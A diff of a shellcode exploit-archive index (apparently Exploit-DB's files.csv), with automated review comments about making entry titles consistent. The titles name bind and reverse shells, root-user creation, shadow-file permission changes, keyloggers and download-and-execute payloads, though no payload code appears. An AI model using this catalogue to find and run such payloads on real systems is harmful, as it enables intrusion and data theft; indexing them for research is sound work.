40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40352,platforms/win_x86/shellcode/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
33836,platforms/windows/shellcode/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 33836,platforms/windows/shellcode/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0
34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0
35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0
35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
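Review bot: 40352 still ends in "(357 Bytes)" with a capital B, while every other row in this hunk writes "bytes". The hunk already normalises case elsewhere ("Re-use" to "Re-Use", "Position independent" to "Position Independent"), so the size suffix should be brought in line too; a case-sensitive match on "bytes)" will otherwise skip this row.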
@ -16245,7 +16247,7 @@ id,file,description,date,author,platform,type,port
36411,platforms/generator/shellcode/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",generator,shellcode,0 36411,platforms/generator/shellcode/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",generator,shellcode,0
36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
@ -16257,19 +16259,19 @@ id,file,description,date,author,platform,type,port
36673,platforms/generator/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",generator,shellcode,0 36673,platforms/generator/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",generator,shellcode,0
36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0 36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0
36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0 36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0
36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
36779,platforms/win_x86/shellcode/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 36779,platforms/win_x86/shellcode/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
36780,platforms/win_x86/shellcode/36780.c,"Windows XP SP3 x86 - Restart Computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 36780,platforms/win_x86/shellcode/36780.c,"Windows XP SP3 x86 - Restart Computer Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0
36781,platforms/generator/shellcode/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",generator,shellcode,0 36781,platforms/generator/shellcode/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",generator,shellcode,0
36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0 36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - execve /bin/sh Via Push Shellcode (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0
36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0
37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader Shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0 37297,platforms/lin_x86/shellcode/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,lin_x86,shellcode,0
37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0 37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0 37362,platforms/lin_x86-64/shellcode/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
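Review bot: the execve naming is still split three ways after this hunk. 36778, 36857, 36858 and 37069 become `execve /bin/sh`, while 36750 keeps `execve(_/sbin/halt_)` and 37362 keeps `execve(/bin/sh)`. The description is the field people search files.csv by, so pick one form for the whole file, or document the rule, so that a single query matches every execve entry.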
@ -16304,18 +16306,18 @@ id,file,description,date,author,platform,type,port
39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
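Review bot: 39152 and 39185 are left with the password and the shell path in opposite order (`Bind TCP /bin/sh Password (hack) Shell` versus `Reverse TCP Password (hack) /bin/sh Shell`), and 39388 names no shell path at all. Since 39337 is being brought to `Bind TCP Shell` here, settle these on one order in the same pass. 39149 and 39151 also carry identical descriptions; if they are not duplicates, a distinguishing detail would help.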
@ -16328,15 +16330,15 @@ id,file,description,date,author,platform,type,port
40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39728,platforms/generator/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode,0 39728,platforms/generator/shellcode/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode,0
39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0 39731,platforms/windows/shellcode/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,windows,shellcode,0
39754,platforms/win_x86/shellcode/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0 39754,platforms/win_x86/shellcode/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0
39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0 39794,platforms/windows/shellcode/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,windows,shellcode,0
39815,platforms/generator/shellcode/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,generator,shellcode,0 39815,platforms/generator/shellcode/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,generator,shellcode,0
39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39885,platforms/multiple/shellcode/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 39885,platforms/multiple/shellcode/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
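Review bot: the new 39847 description, `Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode`, reads as a run-on; the purpose clause does not fit the `action + action` pattern used by 39389 (`Download File + Execute Shellcode`). Suggest dropping "Used To Steal Information" or moving it into parentheses. In the untouched context, 39763 is tagged `(IPv6)` but lists the plain IPv4 address 192.168.209.131, unlike 39722, which uses the `::ffff:` mapped form; worth checking while this block is open.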
@ -16350,7 +16352,7 @@ id,file,description,date,author,platform,type,port
40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
